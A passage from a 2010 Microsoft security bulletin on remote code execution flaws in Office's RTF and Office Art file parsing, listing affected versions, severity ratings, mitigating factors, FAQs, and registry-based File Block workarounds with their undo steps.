recommended solutions pertain only to specific releases of this software, this article provides links to further articles.\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software \r\nMicrosoft Office Suite and Other Software\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nMicrosoft Office Suites \t \t \t \r\n\r\nMicrosoft Office XP Service Pack 3\r\n(KB2289169)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-003\r\n\r\nMicrosoft Office 2003 Service Pack 3\r\n(KB2289187)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-036\r\n\r\nMicrosoft Office 2007 Service Pack 2\r\n(KB2289158)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-036\r\n\r\nMicrosoft Office 2010 (32-bit editions)\r\n(KB2289161)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Office 2010 (64-bit editions)\r\n(KB2289161)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\nMicrosoft Office for Mac\t \t \t \r\n\r\nMicrosoft Office 2004 for Mac[1]\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Office 2008 for Mac[1]\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Office for Mac 2011\r\n(KB2454823)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nOpen XML File Format Converter for Mac[1]\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\n[1]The security updates for Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Open XML File Format Converter for Mac are unavailable at this time.\r\n\r\nNon-Affected Software \r\nOffice and Other Software\r\n\r\nMicrosoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2\r\n\r\nMicrosoft Word Viewer\r\n\r\nMicrosoft Excel Viewer Service Pack 2\r\n\r\nMicrosoft PowerPoint Viewer Service Pack 2\r\n\r\nMicrosoft Visio 2007 Viewer Service Pack 2\r\n\r\nMicrosoft Visio 2010 Viewer\r\n\r\nMicrosoft Works 9\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nWhere are the updates for Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Open XML File Format Converter for Mac? \r\nSecurity updates for Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Open XML File Format Converter for Mac are unavailable at this time. Microsoft will issue updates for these software when testing is complete, to ensure a high degree of quality for their release.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nHow is Microsoft Office Outlook affected by these vulnerabilities? \r\nOutlook is not directly affected because the vulnerabilities can only be exploited through Microsoft Word. If Word is the selected e-mail reader, which is the default setting in Microsoft Outlook 2007 and Microsoft Outlook 2010, then an attacker could leverage Outlook for the e-mail attack vector by sending a specially crafted RTF e-mail message to the target user. In this scenario this attack vector requires minimal user action (as in viewing a specially crafted e-mail through the preview pane in Outlook) to be exploited.\r\n\r\nHow are Microsoft Office standalone programs affected by the vulnerabilities? \r\nA Microsoft Office standalone program is affected with the same severity rating as the corresponding Microsoft Office Suite. For example, a standalone installation of Microsoft Word is affected with the same severity rating as an installation of the affected Microsoft Office Suite.\r\n\r\nI have a non-vulnerable version of software installed, why am I being offered this update? \r\nSome non-affected software, including Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats, Microsoft Word Viewer, Microsoft Excel Viewer, and Microsoft PowerPoint Viewer, contain the vulnerable shared component of Microsoft Office, but because they do not access the vulnerable code, they are not affected by this vulnerability. However, since the vulnerable code is present, this update will be offered.\r\n\r\nDoes the offer to update a non-vulnerable version of Microsoft Office constitute an issue in the Microsoft update mechanism? \r\nNo, the update mechanism is functioning correctly in that it detects a lower version of the files on the system than in the update package and thus, offers the update.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the November bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tRTF Stack Buffer Overflow Vulnerability - CVE-2010-3333\tOffice Art Drawing Records Vulnerability - CVE-2010-3334\tDrawing Exception Handling Vulnerability - CVE-2010-3335\tMSO Large SPID Read AV Vulnerability - CVE-2010-3336\tInsecure Library Loading Vulnerability - CVE-2010-3337\tAggregate Severity Rating\r\nMicrosoft Office Suites\t \t \t \t \t \t \r\n\r\nMicrosoft Office XP Service Pack 3\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Office 2003 Service Pack 3\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Office 2007 Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nMicrosoft Office 2010 (32-bit editions)\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nMicrosoft Office 2010 (64-bit editions)\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nMicrosoft Office for Mac\t \t \t \t \t \t \r\n\r\nMicrosoft Office 2004 for Mac\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Office 2008 for Mac\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nMicrosoft Office for Mac 2011\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nOpen XML File Format Converter for Mac\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\nTop of sectionTop of section\r\n\t\r\nRTF Stack Buffer Overflow Vulnerability - CVE-2010-3333\r\n\r\nA remote code execution vulnerability exists in the way that affected Microsoft Office software parses specially crafted Rich Text Format (RTF) data. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3333.\r\n\t\r\nMitigating Factors for RTF Stack Buffer Overflow Vulnerability - CVE-2010-3333\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker\u2019s Web site, and then convince them to open the specially crafted Office file.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for RTF Stack Buffer Overflow Vulnerability - CVE-2010-3333\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRead e-mails in plain text\r\n\r\nTo help protect yourself from the e-mail attack vector, read e-mail messages in plain text format.\r\n\r\nMicrosoft Office Outlook 2002 users who have applied Office XP Service Pack 1 or a later version can enable this setting and view in plain text only those e-mail messages that are not digitally signed or e-mail messages that are not encrypted.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nImpact of workaround. E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nUse Microsoft Office File Block policy to block the opening of RTF documents from unknown or untrusted sources and locations\r\n\r\nThe following registry scripts can be used to set the File Block policy.\r\n\r\nNote Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.\r\n\r\nFor Office 2003 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"RtfFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.\r\n\r\nFor Office 2007 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"RtfFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2007, all of the latest security updates for Microsoft Office 2007 must be applied.\r\n\r\nFor Office 2010 \r\n\r\nOpen Word 2010 and follow the steps below:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nEnsure the Open check box is selected for the following file types:\r\n- RTF Files\r\n\r\n6.\r\n\t\r\n\r\nUnder Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.\r\n\r\n7.\r\n\t\r\n\r\nClick OK to apply the File Block Settings.\r\n\r\nAlternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.\r\n\r\nImpact of workaround. Users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open RTF files in Office 2003 or 2007 Microsoft Office System. For Microsoft Office 2010, RTF files will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.\r\n\r\nHow to undo the workaround.\r\n\r\nFor Office 2003\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"RtfFiles"=dword:00000000\r\n\r\nFor 2007 Office system\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"RtfFiles"=dword:00000000\r\n\r\nFor Office 2010 \r\n\r\nOpen Word 2010 and follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nClear the Open check box for the file types that you previously selected.\r\n\r\n6.\r\n\t\r\n\r\nClick OK to apply the File Block settings.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for RTF Stack Buffer Overflow Vulnerability - CVE-2010-3333\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen Microsoft Office software parses specially crafted RTF-formatted data, system memory may be corrupted in such a way that an attacker could execute arbitrary code.\r\n\r\nWhat is RTF? \r\nRich Text Format (RTF) is a method of encoding formatted text and graphics for use within applications and for transfer between applications. Users often depend on special translation software to move word-processing documents between various applications developed by different companies. RTF serves as both a standard of data transfer between word processing software, document formatting, and a means of migrating content from one operating system to another.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could cause arbitrary code to run with the privileges of the user who opens a specially crafted RTF file or previews or opens a specially crafted RTF e-mail message. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis vulnerability requires that a user open or preview specially crafted RTF-formatted data with an affected version of Microsoft Office software.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending specially-crafted RTF-formatted data in the contents of an e-mail message. The vulnerability could be exploited when the specially crafted RTF e-mail message is previewed or opened in Outlook while using Word as the e-mail viewer. An attacker could also exploit the vulnerability by sending a specially-crafted RTF file as an attachment and convincing the user to open the specially crafted RTF file.\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains an Office file that is used to attempt to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site, and then convince them to open the specially crafted Office file.\r\n\r\nHow is Microsoft Office affected by this vulnerability? \r\nAlthough the known attack vectors can only leverage Microsoft Word, the vulnerable code exists in a shared component of Microsoft Office.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nSystems where Microsoft Office software is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Microsoft Office parses RTF-formatted data.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nOffice Art Drawing Records Vulnerability - CVE-2010-3334\r\n\r\nA remote code execution vulnerability exists in the way that Microsoft Office software parses specially crafted Office files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3334.\r\n\t\r\nMitigating Factors for Office Art Drawing Records Vulnerability - CVE-2010-3334\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nThe vulnerability cannot be exploited automatically through e-mail. For an attack to be successful, a user must open an attachment that is sent in an e-mail message.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker\u2019s Web site, and then convince them to open the specially crafted Office file.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Office Art Drawing Records Vulnerability - CVE-2010-3334\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nUse Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft Word from unknown or untrusted sources and locations\r\n\r\nThe following registry scripts can be used to set the File Block policy.\r\n\r\nNote Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.\r\n\r\nFor Office 2003 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.\r\n\r\nFor Office 2007 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Office 2007, all of the latest security updates for Microsoft Office 2007 must be applied.\r\n\r\nFor Office 2010 \r\n\r\nOpen Word 2010 and follow the steps below:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nEnsure the Open check box is selected for the following file types:\r\n- Word 2003 Binary Documents and Templates\r\n- Word XP Binary Documents and Templates\r\n- Word 2000 Binary Documents and Templates\r\n- Word 97 Binary Documents and Templates\r\n- Word 95 Binary Documents and Templates\r\n- Word 6.0 Binary Documents and Templates\r\n- Word 2 and earlier Binary Documents and Templates\r\n\r\n6.\r\n\t\r\n\r\nUnder Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.\r\n\r\n7.\r\n\t\r\n\r\nClick OK to apply the File Block Settings.\r\n\r\nAlternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.\r\n\r\nImpact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.\r\n\r\nHow to undo the workaround.\r\n\r\nFor Office 2003\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2007\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2010 \r\n\r\nOpen Word 2010 and follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nClear the Open check box for the file types that you previously selected.\r\n\r\n6.\r\n\t\r\n\r\nClick OK to apply the File Block settings.\r\n\u2022\t\r\n\r\nUse Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft Excel from unknown or untrusted sources and locations\r\n\r\nThe following registry scripts can be used to set the File Block policy.\r\n\r\nNote Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.\r\n\r\nFor Office 2003 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.\r\n\r\nFor Office 2007 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2007, all of the latest security updates for Office 2007 must be applied.\r\n\r\nFor Office 2010 \r\n\r\nOpen Excel 2010 and follow the steps below:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nEnsure the Open check box is selected for the following file types:\r\n- Excel 2007 and later Binary Workbooks\r\n- Excel 97-2003 Add-in Files\r\n- Excel 97-2003 Workbooks and Templates\r\n- Excel 95-97 Workbooks and Templates\r\n- Excel 95 Workbooks\r\n- Excel 4 Workbooks\r\n- Excel 4 Worksheets\r\n- Excel 3 Worksheets\r\n- Excel 2 Worksheets\r\n\r\n6.\r\n\t\r\n\r\nUnder Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.\r\n\r\n7.\r\n\t\r\n\r\nClick OK to apply the File Block Settings.\r\n\r\nAlternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.\r\n\r\nImpact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.\r\n\r\nHow to undo the workaround.\r\n\r\nFor Office 2003\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2007\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2010 \r\n\r\nOpen Excel 2010 and follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nClear the Open check box for the file types that you previously selected.\r\n\r\n6.\r\n\t\r\n\r\nClick OK to apply the File Block settings.\r\n\u2022\t\r\n\r\nUse Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft PowerPoint from unknown or untrusted sources and locations\r\n\r\nThe following registry scripts can be used to set the File Block policy.\r\n\r\nNote Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.\r\n\r\nFor Office 2003 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.\r\n\r\nFor Office 2007 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\PowerPoint\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with the 2007 Microsoft Office system, all of the latest security updates for the 2007 Microsoft Office system must be applied.\r\n\r\nFor Office 2010 \r\n\r\nOpen PowerPoint 2010 and follow the steps below:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nEnsure the Open check box is selected for the following file types:\r\n- PowerPoint 97-2003 Presentations, Shows, Templates and Add-in Files\r\n\r\n6.\r\n\t\r\n\r\nUnder Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.\r\n\r\n7.\r\n\t\r\n\r\nClick OK to apply the File Block Settings.\r\n\r\nAlternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.\r\n\r\nImpact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.\r\n\r\nHow to undo the workaround.\r\n\r\nFor Office 2003\r\n\r\nWindows Registry Editor Version 